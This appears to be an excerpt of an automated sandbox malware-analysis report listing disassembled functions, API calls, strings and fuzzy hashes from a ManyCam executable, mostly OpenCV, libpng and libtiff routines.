cvReleaseImage.CXCORE099(?), ref: 00B916D2
ICSendMessage.MSVFW32(?,0000400E,00000000,00000000), ref: 00B916E9
ICClose.MSVFW32(?,?,0000400E,00000000,00000000), ref: 00B916F2
memset.MSVCR80 ref: 00B9170C

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: MessageSendWindow$CloseDestroyImageReleasememset
String ID:
API String ID: 1564840505-0
Opcode ID: 2a5ef0d4c19fa3de5306b8dbbf3865baaf24de368cd65d88d14ca28acda11bac
Instruction ID: 1909fc058303757930d00f4c8e5f4a0d9d7ff2b49f8fbd10a706caf1849c0ebd
Opcode Fuzzy Hash: 2a5ef0d4c19fa3de5306b8dbbf3865baaf24de368cd65d88d14ca28acda11bac
Instruction Fuzzy Hash: 3E11A7B2510709ABC660AFAADE80D27F7ECFF453447865C5DF28697A40D775F8008B64

Function 00BD3E90 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 213COMMON

Download Yara Rule

APIs

Part of subcall function 00BCC870: GlobalAlloc.KERNEL32(00000000,00000000,00BCFB2A,00BD084E,?,?,?,00BD084E,?,?,00000000,?), ref: 00BCC877

_ftol.MSVCR80 ref: 00BD3F28

Strings

No space to write array, xrefs: 00BD3EDA

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: AllocGlobal_ftol
String ID: No space to write array
API String ID: 2648542381-3993372183
Opcode ID: 02e20b7db01dde699250921756fb672ec61aee7716ee1c8a6df549f7c031d632
Instruction ID: 1adef382cae1a469826a7e186b702409b0c54b09c59a922bd615c14c886bfeb2
Opcode Fuzzy Hash: 02e20b7db01dde699250921756fb672ec61aee7716ee1c8a6df549f7c031d632
Instruction Fuzzy Hash: D56188B690420A9BC710DF14D8819ABFBE8EF84744B1049AAF9558B302E731DE19C7A2

Function 00BC0470 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 129COMMON

Download Yara Rule

APIs

fprintf.MSVCR80 ref: 00BC0609

Strings

Invalid fixed cHRM green point specified, xrefs: 00BC05BD
Invalid cHRM fixed red point specified, xrefs: 00BC05D5
Invalid fixed cHRM white point specified, xrefs: 00BC05ED
Invalid fixed cHRM blue point specified, xrefs: 00BC05A5
cHRM, xrefs: 00BC058D
white_x=%ld, white_y=%ld, xrefs: 00BC0603

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: fprintf
String ID: Invalid cHRM fixed red point specified$Invalid fixed cHRM blue point specified$Invalid fixed cHRM green point specified$Invalid fixed cHRM white point specified$cHRM$white_x=%ld, white_y=%ld
API String ID: 383729395-227365660
Opcode ID: 0ed41b6e6431507a4e27ebf79107804d8d955561da7f346b226353e069c8ea1c
Instruction ID: 0045818ceeb1c00dd3489e2e4fd9636036bb792fc20d7f29a7ae39a9a6eff320
Opcode Fuzzy Hash: 0ed41b6e6431507a4e27ebf79107804d8d955561da7f346b226353e069c8ea1c
Instruction Fuzzy Hash: F3419276500311AFD218E769CCC5CFF73E8EFD4714B84489DF55853211E7A4EA8987A2

Function 00BCC750 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 122fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,-80000000,00000001,00000000,00000002,00000001,00000000), ref: 00BCC7C9
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00BCC803
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00BCC840

Strings

%S: Cannot open, xrefs: 00BCC7D9
Can't allocate space for filename conversion buffer, xrefs: 00BCC81A
<unknown>, xrefs: 00BCC846, 00BCC854
TIFFOpenW, xrefs: 00BCC758, 00BCC7DE, 00BCC81F

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: ByteCharMultiWide$CreateFile
String ID: %S: Cannot open$<unknown>$Can't allocate space for filename conversion buffer$TIFFOpenW
API String ID: 472006099-3993974821
Opcode ID: edfb1f277d3a7e2284762f9eba41738ded2b3f5bdeefa6f4d7b022d2d59ae099
Instruction ID: 3b782a46e4114c68608e409f8db6736e556ddd3a9120892072b17bd7a2eee8cb
Opcode Fuzzy Hash: edfb1f277d3a7e2284762f9eba41738ded2b3f5bdeefa6f4d7b022d2d59ae099
Instruction Fuzzy Hash: 9D3127B674121127E6205579AC8AF7B6ECDCBE1771F2406BAF219E62C1EA558C0142B2

Function 0050E6A0 Relevance: 12.4, APIs: 8, Instructions: 361memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 0050E7D1
memset.MSVCR80 ref: 0050E7E8

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeapmemset
String ID:
API String ID: 622753528-0
Opcode ID: 2c09cb3bd4d98cd5ac2316cddb9aa19e67c7f66a0578b6bf1a6e020fd8d26f0b
Instruction ID: 15c03739bf2cff661cf5d104c6130bcee5a7d3e6e4c58e74d1621743953f5b5e
Opcode Fuzzy Hash: 2c09cb3bd4d98cd5ac2316cddb9aa19e67c7f66a0578b6bf1a6e020fd8d26f0b
Instruction Fuzzy Hash: 81F17A719022199BDB28EB10CD9ABEEBBB4BF54304F1085E9E40A671D1DB745F88CF91

Function 00B9ABC0 Relevance: 12.3, APIs: 8, Instructions: 333COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCR80(?), ref: 00B9AC7E
??2@YAPAXI@Z.MSVCR80(?), ref: 00B9AC9A
??2@YAPAXI@Z.MSVCR80(?), ref: 00B9ACB4
_setjmp3.MSVCR80 ref: 00B9AD39

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: ??2@$_setjmp3
String ID:
API String ID: 4193736177-0
Opcode ID: 662877c835ea13579dd87d4aa4e53fef54bb3453f1de8e9738431b40fb1c83e2
Instruction ID: ec14f28ca0e53537a96649e5057697d7110628552f5b4c70965d252dbe46c01f
Opcode Fuzzy Hash: 662877c835ea13579dd87d4aa4e53fef54bb3453f1de8e9738431b40fb1c83e2
Instruction Fuzzy Hash: 98D16CB19006489FDF34DF24CC95BEA77E9EB44304F2485A9F86AC7252E731E944CB92

Function 004825C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75librarywindowCOMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00482602
GetWindowsDirectoryW.KERNEL32(00000000,00000104,00000104,?,0049A100,7EC02BB4,?), ref: 00482644
LoadLibraryW.KERNEL32(00000000,\winhlp32.exe,000000FF,?,0049A100,7EC02BB4,?), ref: 0048266A
LoadCursorW.USER32(00000000,0000006A), ref: 0048267F
CopyIcon.USER32(?), ref: 00482692
FreeLibrary.KERNEL32(00000000), ref: 004826A5

Strings

\winhlp32.exe, xrefs: 00482654

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: Load$CursorLibrary$CopyDirectoryFreeIconWindows
String ID: \winhlp32.exe
API String ID: 501009500-695620452
Opcode ID: 72d25b9e93f0e45ffb332d077584a673b3d5e48780a8d95c32651a89c6593934
Instruction ID: ec6d5bdbcb5f979a409084d156352cb5eef125df936233655878cf5ad0338882
Opcode Fuzzy Hash: 72d25b9e93f0e45ffb332d077584a673b3d5e48780a8d95c32651a89c6593934
Instruction Fuzzy Hash: 0D313A71D00208AFDB04EFA4E959BEDBBB5FB18314F50462AF916A72D0DB786948CB14

Function 00BBB610 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

fprintf.MSVCR80 ref: 00BBB663
fprintf.MSVCR80 ref: 00BBB67F
fprintf.MSVCR80 ref: 00BBB699
longjmp.MSVCR80(?,00000001,?,?,?,?,?,?,?,?,?,?,Out of Memory!,?), ref: 00BBB6A9

Strings

libpng error: %s, offset=%d, xrefs: 00BBB679
libpng error: %s, xrefs: 00BBB693
libpng error no. %s: %s, xrefs: 00BBB65D

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: fprintf$longjmp
String ID: libpng error no. %s: %s$libpng error: %s$libpng error: %s, offset=%d
API String ID: 1832846611-3377054135
Opcode ID: 2ae5dd0ecbcd9f625efd407bae6acdcb4fb456af72f1dfed077c9679a44e4f43
Instruction ID: 3ceed0b60085dbd90365fa9dd589c8feee5bbf97364b525c6c46c34fcefa1faf
Opcode Fuzzy Hash: 2ae5dd0ecbcd9f625efd407bae6acdcb4fb456af72f1dfed077c9679a44e4f43
Instruction Fuzzy Hash: AA11E9715042416BD3105B28DC69EFAFFE9DB82304F14458AF4C7E72A2EBA5DC45C751

Function 00BAF220 Relevance: 12.3, APIs: 8, Instructions: 298COMMON

Download Yara Rule

APIs

_ftol.MSVCR80 ref: 00BAF559
_ftol.MSVCR80 ref: 00BAF576
_ftol.MSVCR80 ref: 00BAF592
_ftol.MSVCR80 ref: 00BAF5AC
_ftol.MSVCR80 ref: 00BAF5CA
_ftol.MSVCR80 ref: 00BAF5E8
_ftol.MSVCR80 ref: 00BAF604
_ftol.MSVCR80 ref: 00BAF61E

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: _ftol
String ID:
API String ID: 2545261903-0
Opcode ID: afb9fd2aacef2182512d4a46a1022e743f076861730f62f5dcfdfff6946049f5
Instruction ID: 45835c6ee1bf213e8ac0e5e0b579ca5887898eda4bbb95f4fa53e1b71c89dd4c
Opcode Fuzzy Hash: afb9fd2aacef2182512d4a46a1022e743f076861730f62f5dcfdfff6946049f5
Instruction Fuzzy Hash: F3D13872909342DFD3029F21D48925ABFB0FFD5344FA64A99E0D56626AE330C578CF86

Function 004042F0 Relevance: 12.1, APIs: 8, Instructions: 101COMMON

Download Yara Rule

APIs

cvCopy.CXCORE099(?,?,00000000,?,?,?,FFFFFFFE,?,?,?,?,00401620), ref: 00404309
cvInvert.CXCORE099(?,?,00000000,?,?,FFFFFFFE,?,?,?,?,00401620), ref: 00404321
cvGEMM.CXCORE099(?,?,?,?,?,00000000,?,?,?,?,?,FFFFFFFE), ref: 0040436B

Part of subcall function 00403550: cvResetImageROI.CXCORE099(?,?,FFFFFFFE), ref: 004035F7
Part of subcall function 00403550: cvResetImageROI.CXCORE099(?,FFFFFFFE), ref: 00403603
Part of subcall function 00403550: cvResetImageROI.CXCORE099(?,?,FFFFFFFE), ref: 0040360F
Part of subcall function 00403550: cvSet.CXCORE099(?), ref: 00403636
Part of subcall function 00403550: cvSet.CXCORE099(?), ref: 0040365D

cvSetImageROI.CXCORE099(?), ref: 004043B7
cvSetImageROI.CXCORE099(?), ref: 004043D9
cvCopy.CXCORE099(?,?,00000000), ref: 004043E5
cvResetImageROI.CXCORE099(?), ref: 004043EE
cvResetImageROI.CXCORE099(?), ref: 004043F7

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: Image$Reset$Copy$Invert
String ID:
API String ID: 2642547888-0
Opcode ID: e93eb0512fcc8a041c5aa665e6f27bd66d5727e802e950380074bd07c4e28349
Instruction ID: 4832167a604e7eee410914a1b349f3b52c2c1ab0660e6587da0ebae9eec7833f
Opcode Fuzzy Hash: e93eb0512fcc8a041c5aa665e6f27bd66d5727e802e950380074bd07c4e28349
Instruction Fuzzy Hash: 5B3153F4A007009FC314EF14D886F57BBE4AF89710F04896DE98A57381D635E9158BA6

Function 004C27C0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 336COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(map/set<T> too long,7EC02BB4,?,?,00000000,00534159,000000FF,?,004C2664,?,00000001,00000000,004BCB55,00000001,00000000,00000000), ref: 004C2804
std::bad_exception::bad_exception.LIBCMTD ref: 004C2818
_CxxThrowException.MSVCR80(d&L,0057CBF8), ref: 004C2826
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(d&L,0057CBF8,?,?,?,00000000,00534159,000000FF,?,004C2664,?,00000001,00000000,004BCB55,00000001,00000000), ref: 004C2835

Strings

d&L, xrefs: 004C2815, 004C2822, 004C2825
map/set<T> too long, xrefs: 004C27FC

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: d&L$map/set<T> too long
API String ID: 3248949544-2396053701
Opcode ID: 9e2109b489b36a333a9366bcbadb2707d019cd34c0dca1b399f2e05f1bc863c7
Instruction ID: 0421590c6fc88a653ea049570befb3043dc480636a3316981a528d684021d55e
Opcode Fuzzy Hash: 9e2109b489b36a333a9366bcbadb2707d019cd34c0dca1b399f2e05f1bc863c7
Instruction Fuzzy Hash: 8DD11B74A002459FCB04FFA9C991EAF7776AF89304B20456EF4159B356CB78AC05CBB8

Function 004D4D80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 336COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(map/set<T> too long,7EC02BB4,?,?,00000000,00535759,000000FF,?,004D4C24,?,00000001,00000000,?,00000001,00000000,00000000), ref: 004D4DC4
std::bad_exception::bad_exception.LIBCMTD ref: 004D4DD8
_CxxThrowException.MSVCR80($LM,0057CBF8), ref: 004D4DE6
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80($LM,0057CBF8,?,?,?,00000000,00535759,000000FF,?,004D4C24,?,00000001,00000000,?,00000001,00000000), ref: 004D4DF5

Strings

map/set<T> too long, xrefs: 004D4DBC
$LM, xrefs: 004D4DD5, 004D4DE2, 004D4DE5

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: $LM$map/set<T> too long
API String ID: 3248949544-3238143215
Opcode ID: b3a5ef0cd3d0604de93e7cfc4f998ecbca4839092f53841d330d18dc272e40e7
Instruction ID: a07927191520cae1e6be455f76438f534ad6819f987c116f95f500b89d554bea
Opcode Fuzzy Hash: b3a5ef0cd3d0604de93e7cfc4f998ecbca4839092f53841d330d18dc272e40e7
Instruction Fuzzy Hash: A9D10B71A142159FCB04EFE5E8A1E6F7776AFC9304B50455FF0129B359DA38AC02CBA8

Function 004AAB20 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 256COMMON

Download Yara Rule

APIs

Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5

Concurrency::task_options::get_scheduler.LIBCPMTD ref: 004AAC1D
Concurrency::details::SchedulerBase::GetPolicy.LIBCMTD ref: 004AAC4F

Part of subcall function 00438AF0: clock.MSVCR80 ref: 00438B1F

Strings

Inserting effect %s to stack at position %d., xrefs: 004AACE1
CVideoProcessor::InsertEffectToStack, xrefs: 004AAB4B
Inserting effect %s\%s\%s to stack at position %d., xrefs: 004AAC73

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: clock$AllocatorBase::Concurrency::details::Concurrency::task_options::get_schedulerDebugHeapPolicyScheduler
String ID: CVideoProcessor::InsertEffectToStack$Inserting effect %s to stack at position %d.$Inserting effect %s\%s\%s to stack at position %d.
API String ID: 1896687067-3121683814
Opcode ID: 2f379fbdc71ef8fe106dd6932f9e4df42c7bfac42d585d9b32fea62b007a0ea8
Instruction ID: 105fcc333d0e6ff14583993c1dd746094cb4f3fab98b4d368d8a839d86cc259d
Opcode Fuzzy Hash: 2f379fbdc71ef8fe106dd6932f9e4df42c7bfac42d585d9b32fea62b007a0ea8
Instruction Fuzzy Hash: 56B12B70900208EFCB14DFA8C891BDEBBB5BF59314F10825EE419AB391DB74AE45CB95

Function 00B9B0A0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 201COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCR80(00000080), ref: 00B9B104
sprintf.MSVCR80 ref: 00B9B148
sprintf.MSVCR80 ref: 00B9B184

Strings

P%c%d %d255, xrefs: 00B9B17E
%4d, xrefs: 00B9B142

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: sprintf$??2@
String ID: %4d$P%c%d %d255
API String ID: 4280736075-1612107885
Opcode ID: 717b4f879f489a06cce3eedcd6c5f624da0432e249c714acf67fedf5a8425281
Instruction ID: 52aafc5a6815b4ee309980448047afe73af146c58305f0352dd99719570430ee
Opcode Fuzzy Hash: 717b4f879f489a06cce3eedcd6c5f624da0432e249c714acf67fedf5a8425281
Instruction Fuzzy Hash: E061F7725083554BCB00DF28E990A6BBBD1FFD5308F1946ADE895AB302D735EE05C792

